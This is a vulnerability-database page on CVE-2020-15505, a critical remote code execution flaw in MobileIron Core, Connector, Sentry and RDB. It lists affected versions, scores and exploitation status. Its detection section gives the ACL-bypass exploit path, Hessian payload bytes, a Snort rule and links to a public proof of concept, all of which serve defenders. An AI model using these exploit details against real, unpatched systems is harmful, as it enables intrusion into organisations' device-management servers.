cbcvebase.
CVE-2020-15505
published 2020-07-07

CVE-2020-15505: A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.74%
100.0th percentile
A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors.

Affected

13 ranges
VendorProductVersion rangeFixed in
mobileironcore< 10.3.0.410.3.0.4
mobileironcore>= 10.4.0.0 < 10.4.0.410.4.0.4
mobileironcore>= 10.5.1.0 < 10.5.1.110.5.1.1
mobileironcore>= 10.5.2.0 < 10.5.2.110.5.2.1
mobileironcore>= 10.6.0.0 < 10.6.0.110.6.0.1
mobileironenterprise_connector< 10.3.0.410.3.0.4
mobileironenterprise_connector>= 10.4.0.0 < 10.4.0.410.4.0.4
mobileironenterprise_connector>= 10.5.1.0 < 10.5.1.110.5.1.1
mobileironenterprise_connector>= 10.5.2.0 < 10.5.2.110.5.2.1
mobileironenterprise_connector>= 10.6.0.0 < 10.6.0.110.6.0.1
mobileironmonitor_and_reporting_database< 2.0.0.22.0.0.2
mobileironsentry>= 9.7.0 < 9.7.39.7.3
mobileironsentry>= 9.8.0 < 9.8.19.8.1

Detection & IOCsextracted from sources · hover to see the quote

path/mifs/.;/services/LogService
urlhttps://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
urlhttps://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
urlhttps://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10
bytes
63 02 00 48 00 04 (hex: 630200480004)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS Possible MobileIron MDM RCE Inbound (CVE-2020-15505)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/mifs/|2e 3b|/"; fast_pattern; content:"|63 02 00 48 00 84|"; startswith; content:"B|00|e|00|a|00|n|00|F|00|a|00|c|00|"; content:"r|00|m|00|i|00 3a 00 2f 00 2f|"; distance:0; reference:url,blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html; reference:cve,2020-15505; classtype:attempted-admin; sid:2033606; rev:1; metadata:created_at 2021_07_28, cve CVE_2020_15505, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_28;)
  • Exploit requests POST to the ACL-bypass path /mifs/.;/services/LogService with Content-Type: x-application/hessian. A Hessian header must be present; without it the server returns 403 or 500.
  • Successful exploitation responses carry the response header Content-Type: application/x-hessian with HTTP 200. Detect this combination on the /mifs/.;/ URI path.
  • The Snort/ET rule keys on the URI pattern /mifs/|2e 3b|/ (i.e., /mifs/.;/) combined with the Hessian magic bytes |63 02 00 48 00 84| at the start of the POST body, plus BeanFactory and rmi:// strings in the payload.
  • The Metasploit module exploits an ACL bypass to reach a Hessian-based Java deserialization endpoint and executes a Groovy gadget chain.
  • ·Affected versions span a wide range: MobileIron Core & Connector ≤10.6.0.0, Sentry ≤9.8.0, and RDB ≤2.0.0.1. Ensure version fingerprinting covers all listed sub-versions before concluding a host is patched.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.